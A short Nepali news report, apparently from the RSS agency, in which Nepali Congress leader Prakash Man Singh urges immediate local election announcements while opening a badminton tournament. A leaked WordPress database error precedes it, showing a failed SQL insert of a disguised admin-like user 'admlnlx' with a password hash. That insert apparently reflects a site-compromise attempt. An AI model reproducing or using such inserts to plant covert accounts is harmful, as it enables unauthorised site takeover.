WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BTeLbO8Rdd.FTmZObFOLPrL7B2COec1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 10:10:56', '', 'admlnlx', 'admlnlx')
काठमाडौँ, माघ २२ –
नेपाली काँग्रेसका नेता प्रकाशमान सिंहले सरकारले तत्काल स्थानीय निकायको निर्वाचन घोषणा गर्नुपर्ने बताउनुभएको छ ।
किङकम स्पोर्टस क्लबले आयोजना गरेको उपत्यकास्तरीय ब्याडमिन्टन प्रतियोगिताको आज यहाँ उद्घाटन गर्दै उहाँले भन्नुभयो —छोटो समयमा तिनवटै तहको निर्वाचन गर्नुपर्ने भएकाले सरकाले तत्काल स्थानीय निकायको निर्वाचन घोषणा गर्नुपर्दछ ।”
नेता सिंहले “समयमा तीन तहको निर्वाचन नगरे अहिलेसम्म भएको उपलब्धि पनि गुम्न सक्ने भएकाले दलहरु एक भएर निर्वाचनमा जानुपर्छ” भन्दै कुनै पनि बहानामा निर्वाचन रोक्न खोज्यो भने त्यो काँग्रेसलाई मान्य नहुने बताउनुभयो ।
पन्द्रह दिनसम्म चल्ने उक्त प्रतियोगितामा काठमाडौँ उपत्यकाका ३६ टोलीले भाग लिएका छन् । -रासस